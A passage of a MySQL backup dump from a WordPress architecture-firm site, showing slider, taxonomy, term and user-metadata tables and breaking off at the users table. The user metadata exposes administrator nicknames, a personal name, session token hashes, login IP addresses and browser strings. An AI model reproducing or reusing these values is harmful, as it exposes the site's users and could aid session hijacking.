\"e\":true},\"n\":{\"v\":\"246px\"},\"t\":{\"v\":\"186px\"},\"m\":{\"v\":\"114px\"}},\"zIndex\":16},\"behavior\":{\"baseAlign\":\"slide\"},\"group\":{\"groupOrder\":16},\"timeline\":{\"frames\":{\"frame_0\":{\"transform\":{\"x\":{\"d\":{\"v\":\"-50\"},\"n\":{\"v\":\"-42\"},\"t\":{\"v\":\"-31\"},\"m\":{\"v\":\"-19\"}}},\"timeline\":{\"endWithSlide\":false,\"alias\":\"Anim From\"}},\"frame_1\":{\"timeline\":{\"speed\":1000,\"start\":2500,\"endWithSlide\":false,\"alias\":\"Anim To\",\"frameLength\":1000}},\"frame_999\":{\"transform\":{\"opacity\":0},\"timeline\":{\"start\":7000,\"endWithSlide\":true,\"frameLength\":300}}},\"hoverFilterUsed\":false,\"frameOrder\":[{\"id\":\"frame_0\",\"start\":-1},{\"id\":\"frame_1\",\"start\":2500},{\"id\":\"frame_999\",\"start\":7000}],\"split\":false,\"sessionFilterUsed\":false},\"idle\":{\"margin\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"padding\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"fontSize\":{\"n\":{\"v\":\"17\"},\"t\":{\"v\":\"12\"},\"m\":{\"v\":\"7\"}},\"lineHeight\":{\"n\":{\"v\":\"21\"},\"t\":{\"v\":\"15\"},\"m\":{\"v\":\"9\"}},\"backgroundColor\":\"rgba(255, 255, 255, 0)\",\"borderRadius\":{\"v\":[0,0,0,0]},\"borderWidth\":[0,0,0,0],\"whiteSpace\":{\"d\":{\"v\":\"full\"},\"n\":{\"v\":\"full\"},\"t\":{\"v\":\"full\"},\"m\":{\"v\":\"full\"}}},\"hover\":{\"borderRadius\":{\"v\":[0,0,0,0]},\"borderWidth\":[0,0,0,0]},\"actions\":{\"action\":[],\"inactive_actions\":[]},\"visibility\":{\"m\":false,\"n\":false,\"t\":false,\"hideunder\":true},\"type\":\"group\"},\"12\":{\"text\":\"\",\"alias\":\"Line\",\"uid\":12,\"toggle\":{\"text\":\"\"},\"size\":{\"width\":{\"d\":{\"v\":\"1px\",\"e\":true},\"n\":{\"v\":\"1px\"},\"t\":{\"v\":\"1px\"},\"m\":{\"v\":\"1px\"}},\"height\":{\"d\":{\"v\":\"90px\",\"e\":true},\"n\":{\"v\":\"76px\"},\"t\":{\"v\":\"57px\"},\"m\":{\"v\":\"35px\"}},\"originalWidth\":\"300px\",\"originalHeight\":\"180px\",\"aspectRatio\":{\"d\":{\"v\":1.6666666666666667},\"n\":{\"v\":1.6666666666666667},\"t\":{\"v\":1.6666666666666667},\"m\":{\"v\":1.6666666666666667}},\"scaleProportional\":false},\"position\":{\"x\":{\"d\":{\"v\":\"17px\",\"e\":true},\"n\":{\"v\":\"14px\"},\"t\":{\"v\":\"10px\"},\"m\":{\"v\":\"6px\"}},\"y\":{\"d\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\"},\"t\":{\"v\":\"bottom\"},\"m\":{\"v\":\"bottom\"}},\"zIndex\":12},\"group\":{\"puid\":\"10\",\"groupOrder\":12},\"timeline\":{\"frames\":{\"frame_0\":{\"timeline\":{\"endWithSlide\":false}},\"frame_1\":{\"timeline\":{\"endWithSlide\":false,\"frameLength\":300}},\"frame_999\":{\"transform\":{\"opacity\":0},\"timeline\":{\"start\":7000,\"endWithSlide\":true,\"frameLength\":300}}},\"hoverFilterUsed\":false,\"frameOrder\":[{\"id\":\"frame_0\",\"start\":-1},{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":7000}],\"split\":false,\"sessionFilterUsed\":false},\"idle\":{\"margin\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"padding\":{\"d\":{\"v\":[0,0,0,0],\"e\":false},\"n\":{\"v\":[0,0,0,0],\"e\":false},\"t\":{\"v\":[0,0,0,0],\"e\":false},\"m\":{\"v\":[0,0,0,0],\"e\":false}},\"fontSize\":{\"n\":{\"v\":\"17\"},\"t\":{\"v\":\"12\"},\"m\":{\"v\":\"7\"}},\"lineHeight\":{\"n\":{\"v\":\"21\"},\"t\":{\"v\":\"15\"},\"m\":{\"v\":\"9\"}},\"backgroundColor\":\"#ffffff\",\"borderRadius\":{\"v\":[0,0,0,0]},\"borderWidth\":[0,0,0,0],\"whiteSpace\":{\"d\":{\"v\":\"full\"},\"n\":{\"v\":\"full\"},\"t\":{\"v\":\"full\"},\"m\":{\"v\":\"full\"}}},\"hover\":{\"borderRadius\":{\"v\":[0,0,0,0]},\"borderWidth\":[0,0,0,0]},\"actions\":{\"action\":[],\"inactive_actions\":[]},\"type\":\"shape\"},\"top\":{\"uid\":\"top\",\"group\":{\"puid\":-1,\"groupOrder\":7},\"type\":\"zone\",\"alias\":\"TOP ROWS\",\"position\":{\"zIndex\":7},\"text\":\"\"},\"middle\":{\"uid\":\"middle\",\"group\":{\"puid\":-1,\"groupOrder\":6},\"type\":\"zone\",\"alias\":\"MID ROWS\",\"position\":{\"zIndex\":6},\"text\":\"\"},\"bottom\":{\"uid\":\"bottom\",\"group\":{\"puid\":-1,\"groupOrder\":5},\"type\":\"zone\",\"alias\":\"BOTTOM ROWS\",\"position\":{\"zIndex\":5},\"text\":\"\"}}','{\"version\":\"6.5.25\"}');
/*!40000 ALTER TABLE `wpev_revslider_slides` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_revslider_slides_bkp`
--

DROP TABLE IF EXISTS `wpev_revslider_slides_bkp`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_revslider_slides_bkp` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `slider_id` int(9) NOT NULL,
  `slide_order` int(11) NOT NULL,
  `params` longtext NOT NULL,
  `layers` longtext NOT NULL,
  `settings` text NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  KEY `slider_id_index` (`slider_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_revslider_slides_bkp`
--

LOCK TABLES `wpev_revslider_slides_bkp` WRITE;
/*!40000 ALTER TABLE `wpev_revslider_slides_bkp` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpev_revslider_slides_bkp` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_revslider_static_slides`
--

DROP TABLE IF EXISTS `wpev_revslider_static_slides`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_revslider_static_slides` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `slider_id` int(9) NOT NULL,
  `params` longtext NOT NULL,
  `layers` longtext NOT NULL,
  `settings` text NOT NULL,
  PRIMARY KEY (`id`),
  KEY `slider_id_index` (`slider_id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_revslider_static_slides`
--

LOCK TABLES `wpev_revslider_static_slides` WRITE;
/*!40000 ALTER TABLE `wpev_revslider_static_slides` DISABLE KEYS */;
INSERT INTO `wpev_revslider_static_slides` VALUES (1,1,'{\"version\":\"\",\"bg\":{\"image\":\"\"},\"image\":\"\"}','[]','{\"temp\":true}');
/*!40000 ALTER TABLE `wpev_revslider_static_slides` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_revslider_static_slides_bkp`
--

DROP TABLE IF EXISTS `wpev_revslider_static_slides_bkp`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_revslider_static_slides_bkp` (
  `id` int(9) NOT NULL AUTO_INCREMENT,
  `slider_id` int(9) NOT NULL,
  `params` longtext NOT NULL,
  `layers` longtext NOT NULL,
  `settings` text NOT NULL,
  PRIMARY KEY (`id`),
  KEY `slider_id_index` (`slider_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_revslider_static_slides_bkp`
--

LOCK TABLES `wpev_revslider_static_slides_bkp` WRITE;
/*!40000 ALTER TABLE `wpev_revslider_static_slides_bkp` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpev_revslider_static_slides_bkp` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_term_relationships`
--

DROP TABLE IF EXISTS `wpev_term_relationships`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_term_relationships` (
  `object_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `term_taxonomy_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `term_order` int(11) NOT NULL DEFAULT 0,
  PRIMARY KEY (`object_id`,`term_taxonomy_id`),
  KEY `term_taxonomy_id` (`term_taxonomy_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_term_relationships`
--

LOCK TABLES `wpev_term_relationships` WRITE;
/*!40000 ALTER TABLE `wpev_term_relationships` DISABLE KEYS */;
INSERT INTO `wpev_term_relationships` VALUES (1,1,0),(5,2,0),(5,3,0),(5,4,0),(5,5,0),(6,4,0),(6,6,0),(6,7,0),(6,8,0),(6,9,0),(30,53,0),(613,34,0),(613,37,0),(613,46,0),(619,36,0),(619,37,0),(619,40,0),(624,36,0),(624,46,0),(629,36,0),(629,46,0),(634,38,0),(634,46,0),(639,38,0),(639,40,0),(657,35,0),(657,40,0),(662,35,0),(662,38,0),(662,44,0),(665,34,0),(665,37,0),(665,44,0),(677,35,0),(677,44,0),(684,37,0),(684,44,0),(773,53,0),(774,53,0),(1090,24,0),(1090,25,0),(1090,26,0),(1090,59,0),(1090,60,0),(1090,61,0),(1090,62,0),(1090,63,0),(1173,49,0),(1349,43,0),(1349,45,0),(1354,43,0),(2430,24,0),(2430,25,0),(2430,26,0),(2430,27,0),(2430,57,0),(2430,64,0),(2430,65,0),(2432,25,0),(2432,26,0),(2432,57,0),(2432,58,0),(2432,59,0),(3425,10,0),(3425,22,0),(3425,42,0),(3463,10,0),(3463,42,0),(3463,50,0),(3728,10,0),(3728,39,0),(3728,50,0),(3729,10,0),(3729,41,0),(3730,10,0),(3730,47,0),(3730,50,0),(3782,10,0),(3782,50,0),(3783,10,0),(3783,39,0),(3783,41,0),(3783,50,0),(3784,10,0),(3784,22,0),(3784,42,0),(3784,47,0),(3788,10,0),(3788,22,0),(3788,39,0),(3788,41,0),(4637,34,0),(4637,37,0),(4637,46,0),(4638,36,0),(4638,37,0),(4638,40,0),(4639,36,0),(4639,46,0),(4640,36,0),(4640,46,0),(4641,38,0),(4641,46,0),(4642,38,0),(4642,40,0),(4643,35,0),(4643,40,0),(4644,35,0),(4644,38,0),(4644,44,0),(4645,34,0),(4645,37,0),(4645,44,0),(4646,35,0),(4646,44,0),(4647,37,0),(4647,44,0),(4672,54,0),(4675,53,0),(4691,53,0),(4715,53,0),(4731,51,0),(4732,51,0),(4733,51,0),(4762,53,0),(4783,55,0),(4783,56,0),(4985,66,0),(4985,67,0),(4986,66,0),(4986,67,0),(4987,6,0),(4987,68,0),(4988,6,0),(4988,68,0),(4989,6,0),(4989,68,0),(4990,6,0),(4990,68,0),(4991,6,0),(4991,7,0),(4992,6,0),(4992,7,0),(4993,6,0),(4993,7,0),(4994,6,0),(4994,7,0),(4995,6,0),(4995,7,0),(4996,6,0),(4996,7,0);
/*!40000 ALTER TABLE `wpev_term_relationships` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_term_taxonomy`
--

DROP TABLE IF EXISTS `wpev_term_taxonomy`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_term_taxonomy` (
  `term_taxonomy_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `taxonomy` varchar(32) NOT NULL DEFAULT '',
  `description` longtext NOT NULL,
  `parent` bigint(20) unsigned NOT NULL DEFAULT 0,
  `count` bigint(20) NOT NULL DEFAULT 0,
  PRIMARY KEY (`term_taxonomy_id`),
  UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`),
  KEY `taxonomy` (`taxonomy`)
) ENGINE=InnoDB AUTO_INCREMENT=69 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_term_taxonomy`
--

LOCK TABLES `wpev_term_taxonomy` WRITE;
/*!40000 ALTER TABLE `wpev_term_taxonomy` DISABLE KEYS */;
INSERT INTO `wpev_term_taxonomy` VALUES (1,1,'category','',0,1),(2,2,'wpcode_type','',0,1),(3,3,'wpcode_location','',0,1),(4,4,'wpcode_tags','',0,2),(5,5,'wpcode_tags','',0,1),(6,6,'wpcode_type','',0,2),(7,7,'wpcode_location','',0,2),(8,8,'wpcode_tags','',0,1),(9,9,'wpcode_tags','',0,1),(10,10,'product_type','',0,9),(11,11,'product_type','',0,0),(12,12,'product_type','',0,0),(13,13,'product_type','',0,0),(14,14,'product_visibility','',0,0),(15,15,'product_visibility','',0,0),(16,16,'product_visibility','',0,0),(17,17,'product_visibility','',0,0),(18,18,'product_visibility','',0,0),(19,19,'product_visibility','',0,0),(20,20,'product_visibility','',0,0),(21,21,'product_visibility','',0,0),(22,22,'product_visibility','',0,3),(23,23,'product_cat','',0,0),(24,24,'category','',0,2),(25,25,'category','',0,3),(26,26,'category','',0,3),(27,27,'category','',0,1),(28,28,'category','',0,0),(29,29,'post_tag','',0,0),(30,30,'post_tag','',0,0),(31,31,'post_tag','',0,0),(32,32,'post_tag','',0,0),(33,33,'post_tag','',0,0),(34,34,'year_project','',0,4),(35,35,'year_project','',0,6),(36,36,'year_project','',0,6),(37,37,'year_project','',0,8),(38,38,'year_project','',0,6),(39,39,'product_cat','',0,3),(40,40,'category_project','',0,6),(41,41,'product_cat','',0,3),(42,42,'product_cat','',0,3),(43,43,'cat_sev','',0,2),(44,44,'category_project','',0,8),(45,45,'cat_sev','',0,1),(46,46,'category_project','',0,8),(47,47,'product_cat','',0,2),(48,48,'elementor_library_type','',0,0),(49,49,'elementor_library_type','',0,1),(50,50,'product_cat','',0,5),(51,51,'nav_menu','',0,3),(53,53,'nav_menu','',0,7),(54,54,'wp_theme','',0,1),(55,55,'wpcode_type','',0,1),(56,56,'wpcode_location','',0,1),(57,57,'post_tag','',0,2),(58,58,'post_tag','',0,1),(59,59,'post_tag','',0,2),(60,60,'post_tag','',0,1),(61,61,'post_tag','',0,1),(62,62,'post_tag','',0,1),(63,63,'post_tag','',0,1),(64,64,'post_tag','',0,1),(65,65,'post_tag','',0,1),(66,66,'wpcode_type','',0,0),(67,67,'wpcode_location','',0,0),(68,68,'wpcode_location','',0,0);
/*!40000 ALTER TABLE `wpev_term_taxonomy` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_termmeta`
--

DROP TABLE IF EXISTS `wpev_termmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_termmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `term_id` (`term_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=26 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_termmeta`
--

LOCK TABLES `wpev_termmeta` WRITE;
/*!40000 ALTER TABLE `wpev_termmeta` DISABLE KEYS */;
INSERT INTO `wpev_termmeta` VALUES (1,39,'order','0'),(2,39,'order','0'),(3,39,'display_type',''),(4,39,'thumbnail_id','0'),(5,39,'product_count_product_cat','3'),(6,41,'order','0'),(7,41,'order','0'),(8,41,'display_type',''),(9,41,'thumbnail_id','0'),(10,41,'product_count_product_cat','3'),(11,42,'order','0'),(12,42,'order','0'),(13,42,'display_type',''),(14,42,'thumbnail_id','0'),(15,42,'product_count_product_cat','3'),(16,47,'order','0'),(17,47,'order','0'),(18,47,'display_type',''),(19,47,'thumbnail_id','0'),(20,47,'product_count_product_cat','2'),(21,50,'order','0'),(22,50,'order','0'),(23,50,'display_type',''),(24,50,'thumbnail_id','0'),(25,50,'product_count_product_cat','5');
/*!40000 ALTER TABLE `wpev_termmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_terms`
--

DROP TABLE IF EXISTS `wpev_terms`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_terms` (
  `term_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(200) NOT NULL DEFAULT '',
  `slug` varchar(200) NOT NULL DEFAULT '',
  `term_group` bigint(10) NOT NULL DEFAULT 0,
  PRIMARY KEY (`term_id`),
  KEY `slug` (`slug`(191)),
  KEY `name` (`name`(191))
) ENGINE=InnoDB AUTO_INCREMENT=69 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_terms`
--

LOCK TABLES `wpev_terms` WRITE;
/*!40000 ALTER TABLE `wpev_terms` DISABLE KEYS */;
INSERT INTO `wpev_terms` VALUES (1,'Uncategorized','uncategorized',0),(2,'text','text',0),(3,'after_paragraph','after_paragraph',0),(4,'sample','sample',0),(5,'message','message',0),(6,'php','php',0),(7,'everywhere','everywhere',0),(8,'disable','disable',0),(9,'comments','comments',0),(10,'simple','simple',0),(11,'grouped','grouped',0),(12,'variable','variable',0),(13,'external','external',0),(14,'exclude-from-search','exclude-from-search',0),(15,'exclude-from-catalog','exclude-from-catalog',0),(16,'featured','featured',0),(17,'outofstock','outofstock',0),(18,'rated-1','rated-1',0),(19,'rated-2','rated-2',0),(20,'rated-3','rated-3',0),(21,'rated-4','rated-4',0),(22,'rated-5','rated-5',0),(23,'Uncategorized','uncategorized',0),(24,'Residential','residential',0),(25,'Architecture','architecture',0),(26,'Building Design','building-design',0),(27,'Modern Complex','modern-complex',0),(28,'Sweet Home','sweet-home',0),(29,'Architecture','architecture',0),(30,'Interior design','interior-design',0),(31,'Luxury','luxury',0),(32,'Marketing','marketing',0),(33,'Property','property',0),(34,'2018','2018',0),(35,'2019','2019',0),(36,'2020','2020',0),(37,'2021','2021',0),(38,'2022','2022',0),(39,'Amazing Building','amazing-building',0),(40,'Architect','architect',0),(41,'Architecture','architecture',0),(42,'Building Design','building-design',0),(43,'Design','design',0),(44,'Design','design',0),(45,'Interior','interior',0),(46,'Interior','interior',0),(47,'Modern Complex','modern-complex',0),(48,'page','page',0),(49,'section','section',0),(50,'Sweet Home','sweet-home',0),(51,'Menu Explore','menu-explore',0),(53,'Primary','primary',0),(54,'retirio-child','retirio-child',0),(55,'js','js',0),(56,'site_wide_body','site_wide_body',0),(57,'Computer-Aided Design (CAD)','computer-aided-design-cad',0),(58,'Sustainable Design and Efficiency','sustainable-design-and-efficiency',0),(59,'Sustainable Design','sustainable-design',0),(60,'Smart Homes','smart-homes',0),(61,'Biophilic Design','biophilic-design',0),(62,'Personalization and Customization','personalization-and-customization',0),(63,'Minimalism and Maximalism','minimalism-and-maximalism',0),(64,'The Basics: Geometry and Arithmetic','the-basics-geometry-and-arithmetic',0),(65,'Structural Engineering and Calculations','structural-engineering-and-calculations',0),(66,'html','html',0),(67,'site_wide_footer','site_wide_footer',0),(68,'frontend_only','frontend_only',0);
/*!40000 ALTER TABLE `wpev_terms` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_usermeta`
--

DROP TABLE IF EXISTS `wpev_usermeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_usermeta` (
  `umeta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `meta_key` varchar(255) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL,
  PRIMARY KEY (`umeta_id`),
  KEY `user_id` (`user_id`),
  KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=75 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpev_usermeta`
--

LOCK TABLES `wpev_usermeta` WRITE;
/*!40000 ALTER TABLE `wpev_usermeta` DISABLE KEYS */;
INSERT INTO `wpev_usermeta` VALUES (1,1,'nickname','xardyx2'),(2,1,'first_name',''),(3,1,'last_name',''),(4,1,'description',''),(5,1,'rich_editing','true'),(6,1,'syntax_highlighting','true'),(7,1,'comment_shortcuts','false'),(8,1,'admin_color','fresh'),(9,1,'use_ssl','0'),(10,1,'show_admin_bar_front','true'),(11,1,'locale',''),(12,1,'wpev_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(13,1,'wpev_user_level','10'),(14,1,'dismissed_wp_pointers',''),(15,1,'show_welcome_panel','1'),(16,1,'session_tokens','a:1:{s:64:\"f9fc731332dea60c3c05a6c11706797aac5efe6785ec84b19567803cf62fa8a1\";a:4:{s:10:\"expiration\";i:1716012991;s:2:\"ip\";s:15:\"180.252.173.149\";s:2:\"ua\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36\";s:5:\"login\";i:1715840191;}}'),(17,1,'wpev_dashboard_quick_press_last_post_id','4998'),(18,1,'community-events-location','a:1:{s:2:\"ip\";s:13:\"180.252.173.0\";}'),(19,1,'_woocommerce_tracks_anon_id','woo:8bmR6uQAXLirDH18fb8UA1iJ'),(20,1,'wc_last_active','1668384000'),(21,1,'nav_menu_recently_edited','51'),(22,1,'managenav-menuscolumnshidden','a:5:{i:0;s:11:\"link-target\";i:1;s:11:\"css-classes\";i:2;s:3:\"xfn\";i:3;s:11:\"description\";i:4;s:15:\"title-attribute\";}'),(23,1,'metaboxhidden_nav-menus','a:13:{i:0;s:28:\"add-post-type-e-landing-page\";i:1;s:21:\"add-post-type-product\";i:2;s:26:\"add-post-type-ova_projects\";i:3;s:21:\"add-post-type-ova_sev\";i:4;s:18:\"add-post-type-team\";i:5;s:12:\"add-post_tag\";i:6;s:15:\"add-post_format\";i:7;s:15:\"add-product_cat\";i:8;s:15:\"add-product_tag\";i:9;s:20:\"add-category_project\";i:10;s:16:\"add-year_project\";i:11;s:11:\"add-cat_sev\";i:12;s:12:\"add-cat_team\";}'),(24,1,'wpev_persisted_preferences','a:2:{s:14:\"core/edit-post\";a:2:{s:26:\"isComplementaryAreaVisible\";b:1;s:12:\"welcomeGuide\";b:0;}s:9:\"_modified\";s:24:\"2022-11-14T03:48:29.525Z\";}'),(25,1,'wpev_user-settings','editor=tinymce'),(26,1,'wpev_user-settings-time','1683881366'),(27,2,'nickname','ivan'),(28,2,'first_name',''),(29,2,'last_name',''),(30,2,'description',''),(31,2,'rich_editing','true'),(32,2,'syntax_highlighting','true'),(33,2,'comment_shortcuts','false'),(34,2,'admin_color','fresh'),(35,2,'use_ssl','0'),(36,2,'show_admin_bar_front','true'),(37,2,'locale',''),(38,2,'wpev_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(39,2,'wpev_user_level','10'),(40,2,'dismissed_wp_pointers',''),(41,2,'session_tokens','a:3:{s:64:\"8adf4ed07715daff91ca21ea8b6a08297a8d20e4d13f6740a5fece2089201e08\";a:4:{s:10:\"expiration\";i:1695774644;s:2:\"ip\";s:14:\"175.158.50.150\";s:2:\"ua\";s:101:\"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36\";s:5:\"login\";i:1695601844;}s:64:\"e8ed7a72305a787a98a779a7ac012b5276baa4e16f414825f4e44fd25d8bd798\";a:4:{s:10:\"expiration\";i:1695776462;s:2:\"ip\";s:14:\"175.158.50.150\";s:2:\"ua\";s:101:\"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36\";s:5:\"login\";i:1695603662;}s:64:\"dc2233bf3bf348e53c5e08958e7713de6485f247f52ac1aaa2e6eb98248d7189\";a:4:{s:10:\"expiration\";i:1695907036;s:2:\"ip\";s:14:\"175.158.50.150\";s:2:\"ua\";s:111:\"Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36\";s:5:\"login\";i:1695734236;}}'),(42,2,'wpev_dashboard_quick_press_last_post_id','4978'),(43,2,'community-events-location','a:1:{s:2:\"ip\";s:12:\"175.158.50.0\";}'),(44,2,'elementor_introduction','a:1:{s:7:\"exit_to\";b:1;}'),(45,2,'wpev_persisted_preferences','a:2:{s:14:\"core/edit-post\";a:3:{s:26:\"isComplementaryAreaVisible\";b:1;s:12:\"welcomeGuide\";b:0;s:10:\"openPanels\";a:3:{i:0;s:14:\"featured-image\";i:1;s:12:\"post-excerpt\";i:2;s:11:\"post-status\";}}s:9:\"_modified\";s:24:\"2023-05-25T11:11:19.062Z\";}'),(46,2,'wpev_user-settings','editor=tinymce&libraryContent=browse'),(47,2,'wpev_user-settings-time','1685011828'),(48,3,'nickname','thomas'),(49,3,'first_name','Thomas Joseph'),(50,3,'last_name','-'),(51,3,'description',''),(52,3,'rich_editing','true'),(53,3,'syntax_highlighting','true'),(54,3,'comment_shortcuts','false'),(55,3,'admin_color','fresh'),(56,3,'use_ssl','0'),(57,3,'show_admin_bar_front','true'),(58,3,'locale',''),(59,3,'wpev_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(60,3,'wpev_user_level','10'),(61,3,'dismissed_wp_pointers',''),(63,3,'wpev_user-settings','editor=tinymce&libraryContent=browse'),(64,3,'wpev_user-settings-time','1695374243'),(65,3,'wpev_dashboard_quick_press_last_post_id','4894'),(66,3,'community-events-location','a:1:{s:2:\"ip\";s:11:\"180.243.8.0\";}'),(67,3,'wpev_persisted_preferences','a:2:{s:14:\"core/edit-post\";a:3:{s:26:\"isComplementaryAreaVisible\";b:1;s:12:\"welcomeGuide\";b:0;s:10:\"openPanels\";a:3:{i:0;s:11:\"post-status\";i:1;s:22:\"taxonomy-panel-cat_sev\";i:2;s:12:\"post-excerpt\";}}s:9:\"_modified\";s:24:\"2023-09-22T09:19:09.373Z\";}'),(68,3,'elementor_introduction','a:1:{s:7:\"exit_to\";b:1;}'),(69,2,'nav_menu_recently_edited','51'),(70,2,'managenav-menuscolumnshidden','a:5:{i:0;s:11:\"link-target\";i:1;s:11:\"css-classes\";i:2;s:3:\"xfn\";i:3;s:11:\"description\";i:4;s:15:\"title-attribute\";}'),(71,2,'metaboxhidden_nav-menus','a:10:{i:0;s:28:\"add-post-type-e-landing-page\";i:1;s:26:\"add-post-type-ova_projects\";i:2;s:21:\"add-post-type-ova_sev\";i:3;s:18:\"add-post-type-team\";i:4;s:12:\"add-post_tag\";i:5;s:15:\"add-post_format\";i:6;s:20:\"add-category_project\";i:7;s:16:\"add-year_project\";i:8;s:11:\"add-cat_sev\";i:9;s:12:\"add-cat_team\";}'),(72,3,'closedpostboxes_post','a:1:{i:0;s:23:\"ova_met_general_setting\";}'),(73,3,'metaboxhidden_post','a:8:{i:0;s:22:\"ova_met_header_version\";i:1;s:22:\"ova_met_footer_version\";i:2;s:19:\"ova_met_main_layout\";i:3;s:17:\"ova_met_wide_site\";i:4;s:21:\"ova_met_embed_setting\";i:5;s:19:\"ova_met_embed_media\";i:6;s:23:\"ova_met_gallery_setting\";i:7;s:25:\"slider_revolution_metabox\";}'),(74,3,'session_tokens','a:1:{s:64:\"b4bcbc72d77aa6c1a5580ff112e1901d9ed8270510331460d243a46d0003ab3e\";a:4:{s:10:\"expiration\";i:1695891594;s:2:\"ip\";s:13:\"180.243.8.234\";s:2:\"ua\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36\";s:5:\"login\";i:1695718794;}}');
/*!40000 ALTER TABLE `wpev_usermeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpev_users`
--

DROP TABLE IF EXISTS `wpev_users`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpev_users` (
